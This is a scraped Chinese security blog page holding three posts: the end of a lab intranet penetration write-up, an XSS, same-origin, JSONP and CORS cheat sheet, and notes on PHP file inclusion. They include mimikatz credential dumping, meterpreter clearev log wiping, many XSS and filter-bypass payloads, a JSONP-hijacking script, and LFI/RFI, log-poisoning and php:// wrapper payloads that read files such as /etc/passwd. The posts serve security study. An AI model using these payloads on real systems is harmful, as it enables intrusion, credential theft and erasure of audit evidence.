<p><img src="/images/2020/03/09/15.png" alt=""></p>
<p>成功反弹获取session。</p>
<ul>
<li><strong>抓取明文信息</strong></li>
</ul>
<p>使用<code>mimikatz</code>抓取明文密码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; load mimikatz</span><br><span class="line"></span><br><span class="line">meterpreter &gt; wdigest</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/09/16.png" alt=""></p>
<h2 id="清理痕迹"><a href="#清理痕迹" class="headerlink" title="清理痕迹"></a>清理痕迹</h2><ul>
<li>删除添加的域管理账号(这里没有添加)；</li>
<li>删除服务器上渗透上传的工具；</li>
<li>删除应用程序、系统和安全日志；</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; clearev</span><br><span class="line">[*] Wiping 1474 records from Application...</span><br><span class="line">[*] Wiping 4836 records from System...</span><br><span class="line">[*] Wiping 41363 records from Security...</span><br></pre></td></tr></table></figure>
<ul>
<li>断开MSF等连接；</li>
<li>其他。</li>
</ul>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这次的靶机环境比较简单，只是用MSF配合一些小工具使用，归纳下前面的漏洞利用：</p>
<ul>
<li>phpMyAdmin弱口令配合探针信息(WWW绝对路径)日志写Shell；</li>
<li>CMS后台弱口令配合后台模板管理写Shell；</li>
<li>备份文件文件泄漏数据库配置和CMS源码等信息；</li>
<li>内网主机未打补丁，可以直接远程获取系统权限(MS08-067、MS17-010)。</li>
</ul>
<p>主机上还有些其他的服务，比如<code>FTP</code>、<code>Weblogic</code>和<code>LDAP</code>等可能存在漏洞，信息收集可以看看浏览器有没有保存密码什么的，<code>mimikatz</code>抓不到明文看看是不是64位机子加载到32位版本了，<code>payload</code>打过去异常可以换一个试试或者看看是不是防火墙的影响什么的，总之，没有一成不变的办法，遇到问题还要多分析。</p>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/07/XSS%E3%80%81%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5%E3%80%81JSONP%E3%80%81CORS%E5%92%8CWebSocket/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/03/07/XSS%E3%80%81%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5%E3%80%81JSONP%E3%80%81CORS%E5%92%8CWebSocket/" itemprop="url">XSS、同源策略、JSONP、CORS和WebSocket</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-07T11:18:22+08:00">
                2020-03-07
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <table>
<thead>
<tr>
<th>类型</th>
<th>内容</th>
<th>位置</th>
</tr>
</thead>
<tbody><tr>
<td>反射型</td>
<td>服务端不保存数据，输入即时反馈到前端执行</td>
<td>后端</td>
</tr>
<tr>
<td>存储型</td>
<td>服务端保存数据，由服务端取出反馈到前端执行</td>
<td>后端</td>
</tr>
<tr>
<td>DOM型</td>
<td>取出和执行由前端浏览器端完成</td>
<td>前端</td>
</tr>
</tbody></table>
<h3 id="编码对照表"><a href="#编码对照表" class="headerlink" title="编码对照表"></a>编码对照表</h3><table>
<thead>
<tr>
<th>位置</th>
<th align="center">示例</th>
<th align="center">编码方式</th>
<th align="center">编码示例</th>
</tr>
</thead>
<tbody><tr>
<td>HTML标签之间</td>
<td align="center"><code>&lt;div&gt;xxoo&lt;/div&gt;</code></td>
<td align="center">HTML Entity编码</td>
<td align="center"><code>&amp;amp;</code></td>
</tr>
<tr>
<td>HTML标签属性</td>
<td align="center"><code>&lt;img src=&quot;xxoo&quot; /&gt;</code></td>
<td align="center">HTML Attribute编码</td>
<td align="center"><code>&amp;#xHH;</code></td>
</tr>
<tr>
<td>Javascript标签之间</td>
<td align="center"><code>&lt;script&gt;var xss=&quot;xxoo&quot;&lt;/script&gt;</code></td>
<td align="center">Javascript编码</td>
<td align="center"><code>\xHH</code></td>
</tr>
<tr>
<td>HTML标签属性的URL</td>
<td align="center"><code>&lt;a href=&quot;/xss?p=xxoo&quot;&gt;xss&lt;/a&gt;</code></td>
<td align="center">URL编码</td>
<td align="center"><code>%HH</code></td>
</tr>
<tr>
<td>CSS的Style属性</td>
<td align="center"><code>&lt;div style=&quot;width:xxoo;&quot;&gt;xss&lt;/div&gt;</code></td>
<td align="center">CSS编码</td>
<td align="center"><code>\HH</code></td>
</tr>
</tbody></table>
<h3 id="常见标签"><a href="#常见标签" class="headerlink" title="常见标签"></a>常见标签</h3><table>
<thead>
<tr>
<th>类型</th>
<th>内容</th>
</tr>
</thead>
<tbody><tr>
<td><code>&lt;a&gt;</code></td>
<td><code>&lt;a href=&quot;xxx&quot; onmouseover=alert(1)&gt;x&lt;/a&gt;</code>、<code>&lt;a href=&quot;xxx&quot; onclimbatree=alert(1)&gt;x&lt;/a&gt;</code></td>
</tr>
<tr>
<td><code>&lt;script&gt;</code></td>
<td><code>&lt;scirpt&gt;alert(&quot;xss&quot;);&lt;/script&gt;</code></td>
</tr>
<tr>
<td><code>&lt;img&gt;</code></td>
<td><code>&lt;img src=1 onerror=alert(&quot;xss&quot;);&gt;</code></td>
</tr>
<tr>
<td><code>&lt;input&gt;</code></td>
<td><code>&lt;input onfocus=&quot;alert(&#39;xss&#39;);&quot;&gt;</code>、<code>&lt;input onfocus=&quot;alert(&#39;xss&#39;);&quot; autofocus&gt;</code></td>
</tr>
<tr>
<td><code>&lt;details&gt;</code></td>
<td><code>&lt;details ontoggle=&quot;alert(&#39;xss&#39;);&quot;&gt;</code>、<code>&lt;details open ontoggle=&quot;alert(&#39;xss&#39;);&quot;&gt;</code></td>
</tr>
<tr>
<td><code>&lt;svg&gt;</code></td>
<td><code>&lt;svg onload=alert(&quot;xss&quot;);&gt;</code></td>
</tr>
<tr>
<td><code>&lt;select&gt;</code></td>
<td><code>&lt;select onfocus=alert(1)&gt;&lt;/select&gt;</code>、<code>&lt;select onfocus=alert(1) autofocus&gt;</code></td>
</tr>
<tr>
<td><code>&lt;iframe&gt;</code></td>
<td><code>&lt;iframe onload=alert(&quot;xss&quot;);&gt;&lt;/iframe&gt;</code></td>
</tr>
<tr>
<td><code>&lt;video&gt;</code></td>
<td><code>&lt;video&gt;&lt;source onerror=&quot;alert(1)&quot;&gt;</code></td>
</tr>
<tr>
<td><code>&lt;audio&gt;</code></td>
<td><code>&lt;audio src=x  onerror=alert(&quot;xss&quot;);&gt;</code></td>
</tr>
<tr>
<td><code>&lt;body&gt;</code></td>
<td><code>&lt;body onload=alert(&quot;xss&quot;);&gt;</code></td>
</tr>
<tr>
<td><code>&lt;textarea&gt;</code></td>
<td><code>&lt;textarea onfocus=alert(&quot;xss&quot;); autofocus&gt;</code></td>
</tr>
<tr>
<td><code>&lt;keygen&gt;</code></td>
<td><code>&lt;keygen autofocus onfocus=alert(1)&gt;</code> # Firefox</td>
</tr>
<tr>
<td><code>&lt;marquee&gt;</code></td>
<td><code>&lt;marquee onstart=alert(&quot;xss&quot;)&gt;&lt;/marquee&gt;</code> # FireFox、IE</td>
</tr>
<tr>
<td><code>&lt;isindex&gt;</code></td>
<td><code>&lt;isindex type=image src=1 onerror=alert(&quot;xss&quot;)&gt;</code> # IE</td>
</tr>
<tr>
<td><code>&lt;link&gt;</code></td>
<td><code>&lt;link rel=import href=&quot;http://127.0.0.1/1.js&quot;&gt;</code></td>
</tr>
<tr>
<td>javascript伪协议</td>
<td><code>&lt;a href=&quot;javascript:alert(</code>xss<code>);&quot;&gt;xss&lt;/a&gt;</code> <br> <code>&lt;iframe src=javascript:alert(&#39;xss&#39;);&gt;&lt;/iframe&gt;</code> <br> <code>&lt;form action=&quot;Javascript:alert(1)&quot;&gt;&lt;input type=submit&gt;</code></td>
</tr>
</tbody></table>
<h3 id="过滤与绕过"><a href="#过滤与绕过" class="headerlink" title="过滤与绕过"></a>过滤与绕过</h3><table>
<thead>
<tr>
<th>类型</th>
<th>内容</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td>过滤引号</td>
<td><code>&lt;img src=&quot;x&quot; onerror=alert(`xss`);&gt;</code></td>
<td>编码绕过 <br> JS中用反引号 <br> HTML可不用引号</td>
</tr>
<tr>
<td>过滤括号</td>
<td><code>&lt;svg/onload=&quot;window.onerror=eval;throw&#39;=alert\x281\x29&#39;;&quot;&gt;</code></td>
<td>-</td>
</tr>
<tr>
<td>过滤URL</td>
<td><code>&lt;img src=&quot;x&quot; onerror=document.location=`http://%77%77%77%2e.../`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=document.location=`http://2130706433/`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=document.location=`http://0177.0.0.01/`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=document.location=`http://0x7f.0x0.0x0.0x1/`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=document.location=`//www.baidu.com`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=&quot;document.location=`http://www。baidu。com`&quot;&gt;</code></td>
<td>URL编码 <br> 进制转换 <br> <code>//</code>代替<code>http://</code></td>
</tr>
<tr>
<td>大小写</td>
<td><code>&lt;scRiPt&gt;alert(1);&lt;/scrIPt&gt;</code></td>
<td>-</td>
</tr>
<tr>
<td>过滤标签</td>
<td><code>&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;script&gt;ipt&gt;</code></td>
<td>-</td>
</tr>
</tbody></table>
<h3 id="同源策略"><a href="#同源策略" class="headerlink" title="同源策略"></a>同源策略</h3><p>同源策略（Same origin policy）是一种约定，同协议、同端口、同主机（域名），目的是为了保证用户信息的安全，防止恶意的网站窃取数据。</p>
<ul>
<li>限制范围</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Cookie、LocalStorage 和 IndexDB 无法读取。</span><br><span class="line"></span><br><span class="line">DOM 无法获得。</span><br><span class="line"></span><br><span class="line">AJAX 请求不能发送。</span><br></pre></td></tr></table></figure>

<ul>
<li>修改源</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">document.domain &#x3D; &quot;test.com&quot;</span><br></pre></td></tr></table></figure>

<h3 id="JSONP"><a href="#JSONP" class="headerlink" title="JSONP"></a>JSONP</h3><p>JSONP(JSON with Padding)是实现跨域的一种技术，可以跨域读取数据。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$.getJSON(&quot;https:&#x2F;&#x2F;www.xxx.com&#x2F;jsonp.php?jsoncallback&#x3D;?&quot;, function(data) &#123;</span><br><span class="line"></span><br><span class="line">   do something...</span><br><span class="line"></span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<ul>
<li>callback XSS</li>
</ul>
<p>当服务器自定义<code>callback</code>，未定义<code>Content-Type</code>头，且这样写时会导致XSS：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $callback &#x3D; $_REQUEST[&#39;callback&#39;];</span><br><span class="line"></span><br><span class="line">    $data &#x3D; array(</span><br><span class="line">        ...</span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    echo $callback . &quot;(&quot; . json_encode($data) . &quot;)&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><code>Content-Type</code>值：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">text&#x2F;json</span><br><span class="line">application&#x2F;json</span><br><span class="line">text&#x2F;javascript</span><br><span class="line">application&#x2F;javascript</span><br></pre></td></tr></table></figure>

<ul>
<li>JSNOP劫持</li>
</ul>
<p>类似CRSF，区别在于JSONP劫持可以回传数据到指定地址，当服务器未做严格的来源校验时，会导致劫持敏感信息，攻击脚本可以这样写：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type&#x3D;&quot;text&#x2F;javascript&quot;&gt;</span><br><span class="line">    function attack(data)&#123;</span><br><span class="line">        console.log(data);  &#x2F;&#x2F; 可以替换写入恶意脚本，发送数据</span><br><span class="line">    &#125;</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script src&#x3D;&quot;https:&#x2F;&#x2F;xxx.com&#x2F;jsonp.php?callback&#x3D;attack&quot;&gt;&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>空Referer</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1. iframe的src javascript伪协议</span><br><span class="line"></span><br><span class="line">&lt;iframe src&#x3D;&quot;javascript:&#39;&lt;script&gt; ... &lt;&#x2F;script&gt;&#39;&quot;&gt;&lt;&#x2F;iframe&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">2. meta标签</span><br><span class="line"></span><br><span class="line">&lt;meta name&#x3D;&quot;referrer&quot; content&#x3D;&quot;never&quot;&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">3. HTTPS向HTTP请求</span><br></pre></td></tr></table></figure>


<h3 id="WebSocket"><a href="#WebSocket" class="headerlink" title="WebSocket"></a>WebSocket</h3><p>WebSocket 是 HTML5 开始提供的一种在单个 TCP 连接上进行全双工通讯的协议，允许服务端主动向客户端推送数据。</p>
<ul>
<li>ws://（非加密）和wss://（加密）；</li>
<li>建立在 TCP 协议之上；</li>
<li>数据轻量化；</li>
<li>可发送文本和二进制数据；</li>
<li>没有同源策略限制。</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var Socket &#x3D; new WebSocket(url, [protocol] );</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.runoob.com&#x2F;html&#x2F;html5-websocket.html</span><br></pre></td></tr></table></figure>


<h3 id="CORS"><a href="#CORS" class="headerlink" title="CORS"></a>CORS</h3><p>跨域资源共享(CORS) 是一种机制，通过定义额外的HTTP头来使浏览器能够允许不同源之间的资源交互。</p>
<ul>
<li>请求</li>
</ul>
<table>
<thead>
<tr>
<th>类型</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td>Origin：<code>&lt;origin&gt;</code></td>
<td>表示实际请求的源站</td>
</tr>
<tr>
<td>Access-Control-Request-Method: <code>&lt;method&gt;</code></td>
<td>用于预检请求，表示真实的请求方法</td>
</tr>
<tr>
<td>Access-Control-Request-Headers: <code>&lt;field-name&gt;[, &lt;field-name&gt;]*</code></td>
<td>用于预检请求，表示真实请求所携带的首部字段</td>
</tr>
</tbody></table>
<ul>
<li>响应</li>
</ul>
<table>
<thead>
<tr>
<th>类型</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td>Access-Control-Allow-Origin: `<origin></td>
<td>*`</td>
</tr>
<tr>
<td>Access-Control-Allow-Credentials：false</td>
<td>是否允许浏览器读取Response内容（如Cookie）</td>
</tr>
<tr>
<td>Access-Control-Allow-Methods</td>
<td>用于预检请求响应，表示允许使用的HTTP方法</td>
</tr>
<tr>
<td>Access-Control-Allow-Headers</td>
<td>用于预检请求响应，表示允许携带的头部</td>
</tr>
<tr>
<td>Access-Control-Expose-Headers</td>
<td>允许响应时能获取的其他头部</td>
</tr>
<tr>
<td>Access-Control-Max-Age</td>
<td>Preflight请求的最大响应时间</td>
</tr>
</tbody></table>
<ul>
<li>CORS漏洞</li>
</ul>
<p>检测方式通常是修改<code>Origin</code>头字段值，看<code>Access-Control-Allow-Origin</code>返回的结果。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl https:&#x2F;&#x2F;www.abc.com -H &quot;Origin: https:&#x2F;&#x2F;test.com&quot; -I</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1. 发送origin&#x3D;NULL</span><br><span class="line"></span><br><span class="line">&lt;iframe sandbox&#x3D;&quot;allow-scripts allow-top-navigation allow-forms&quot; src&#x3D;&#39;data:text&#x2F;html,&lt;script&gt; ... &lt;&#x2F;script&gt;&#39;&gt;&lt;&#x2F;iframe&gt;</span><br><span class="line"></span><br><span class="line">2. 域名校验不严格</span><br><span class="line"></span><br><span class="line">aa.com -&gt; aa.com.cn</span><br><span class="line"></span><br><span class="line">3 ...</span><br></pre></td></tr></table></figure>

<h3 id="参见"><a href="#参见" class="headerlink" title="参见"></a>参见</h3><ul>
<li><a href="https://xz.aliyun.com/t/4067" target="_blank" rel="noopener">https://xz.aliyun.com/t/4067</a></li>
<li><a href="https://www.freebuf.com/articles/web/195925.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/195925.html</a></li>
<li><a href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Access_control_CORS" target="_blank" rel="noopener">https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Access_control_CORS</a></li>
</ul>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/05/PHP-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%B0%8F%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/03/05/PHP-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%B0%8F%E7%BB%93/" itemprop="url">PHP 文件包含小结</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-05T09:09:00+08:00">
                2020-03-05
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <h2 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h2><h3 id="require"><a href="#require" class="headerlink" title="require()"></a>require()</h3><p>生成致命错误 (E_COMPILE_ERROR) 并停止脚本。</p>
<h3 id="include"><a href="#include" class="headerlink" title="include()"></a>include()</h3><p>只生成警告（E_WARNING），脚本会继续。</p>
<h3 id="require-once-amp-include-once"><a href="#require-once-amp-include-once" class="headerlink" title="require_once() &amp; include_once()"></a>require_once() &amp; include_once()</h3><p>如前面已包含，忽略本次，用于嵌套包含，避免函数重定义，变量重新赋值等。</p>
<h2 id="包含文件"><a href="#包含文件" class="headerlink" title="包含文件"></a>包含文件</h2><h3 id="本地文件包含"><a href="#本地文件包含" class="headerlink" title="本地文件包含"></a>本地文件包含</h3><ul>
<li><code>%00</code>截断： PHP版本 &lt; 5.3.4， <code>magic_quotes_gpc=Off</code></li>
<li>长度截断： PHP版本 &lt; php 5.2.8，Windows为256字节、Linux为4096字节</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">include($filename.&quot;.php&quot;);</span><br><span class="line"></span><br><span class="line">?file&#x3D;phpinfo.txt%00</span><br><span class="line"></span><br><span class="line">?file&#x3D;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;. ... .&#x2F;.&#x2F;.&#x2F;shell.txt</span><br></pre></td></tr></table></figure>

<h3 id="包含session文件"><a href="#包含session文件" class="headerlink" title="包含session文件"></a>包含session文件</h3><ul>
<li>session文件路径： phpinfo()</li>
<li>session.use_strict_mode：<code>session id</code>使用方式，0 - 客户端，1 - 服务端，缺省为0</li>
<li>phpstudy的<code>sessionId</code>存储目录默认在<code>tmp/tmp</code></li>
</ul>
<h3 id="包含资源文件"><a href="#包含资源文件" class="headerlink" title="包含资源文件"></a>包含资源文件</h3><ul>
<li>.jpg/.png …</li>
<li>.rar/.zip/.tar/.tar.gz/.7z …</li>
<li>.txt/.doc/.xls/.docx</li>
<li>.mp4/.mp3 …</li>
<li>…</li>
</ul>
<h3 id="包含日志文件"><a href="#包含日志文件" class="headerlink" title="包含日志文件"></a>包含日志文件</h3><ul>
<li>中间件日志：access.log、error.log …</li>
<li>FTP日志： /var/log/vsftpd.log （用户名输入一句话）</li>
<li>SSH日志： /var/log/auth.log</li>
<li>MySQL日志： /var/log/mysql/error.log</li>
<li>Web应用日志</li>
<li>…</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ssh &quot;&lt;?php phpinfo(); ?&gt;&quot;@192.168.1.1</span><br><span class="line"></span><br><span class="line">&#x2F;var&#x2F;log&#x2F;nginx&#x2F;</span><br><span class="line"></span><br><span class="line">&#x2F;var&#x2F;log&#x2F;apache2&#x2F;</span><br><span class="line"></span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<h3 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen &#x3D; On  默认为 On</span><br><span class="line"></span><br><span class="line">allow_url_include &#x3D; On  &gt;&#x3D; 5.2 默认为 Off</span><br></pre></td></tr></table></figure>

<ul>
<li>问号绕过： <code>http://xxx/abc.txt?</code></li>
<li>井号绕过： <code>http://xxx/abc.txt%23</code></li>
<li>空格绕过： <code>http://xxx/abc.txt%20</code></li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">include($filename.&quot;.php&quot;);</span><br></pre></td></tr></table></figure>

<h2 id="伪协议"><a href="#伪协议" class="headerlink" title="伪协议"></a>伪协议</h2><ul>
<li>file://</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?file&#x3D;file:&#x2F;&#x2F;.&#x2F;1.txt</span><br><span class="line"></span><br><span class="line">?file&#x3D;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<ul>
<li>php://filter</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?filename&#x3D;php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;filename</span><br></pre></td></tr></table></figure>

<ul>
<li>data://</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">PHP版本 &gt;&#x3D; 5.2</span><br><span class="line"></span><br><span class="line">allow_url_fopen: On</span><br><span class="line"></span><br><span class="line">allow_url_include: On</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?filename&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php phpinfo(); ?&gt;</span><br><span class="line"></span><br><span class="line">?filename&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;base64,PD9waHAgcGhwaW5mbygpOyA&#x2F;Pgo&#x3D;</span><br></pre></td></tr></table></figure>

<ul>
<li>zip://</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PHP版本 &gt;&#x3D; 5.3.0</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?file&#x3D;zip:&#x2F;&#x2F;C:&#x2F;uploads&#x2F;phpinfo.zip%23phpinfo.php</span><br><span class="line"></span><br><span class="line">?file&#x3D;zip:&#x2F;&#x2F;.&#x2F;uploads&#x2F;file.jpg%23phpcode.txt</span><br></pre></td></tr></table></figure>

<ul>
<li>bzip2://</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PHP版本 &gt;&#x3D; 5.3.0</span><br><span class="line"></span><br><span class="line">xxx.bz2 格式</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?file&#x3D;compress.bzip2:&#x2F;&#x2F;C:&#x2F;uploads&#x2F;file.jpg</span><br></pre></td></tr></table></figure>

<ul>
<li>zlib://</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PHP版本 &gt;&#x3D; 5.3.0</span><br><span class="line"></span><br><span class="line">xxx.gz 格式</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?file&#x3D;compress.zlib:&#x2F;&#x2F;C:&#x2F;uploads&#x2F;file.jpg</span><br></pre></td></tr></table></figure>

<ul>
<li>php://input</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">allow_url_include &#x3D; On</span><br><span class="line"></span><br><span class="line">enctype&#x3D;multipart&#x2F;form-data 时无效</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?file&#x3D;php:&#x2F;&#x2F;input</span><br></pre></td></tr></table></figure>

<ul>
<li>php://filter</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;1.txt</span><br><span class="line"></span><br><span class="line">?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;phpinfo.php</span><br><span class="line"></span><br><span class="line">?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;phpinfo.php</span><br></pre></td></tr></table></figure>

<ul>
<li>phar://</li>
</ul>
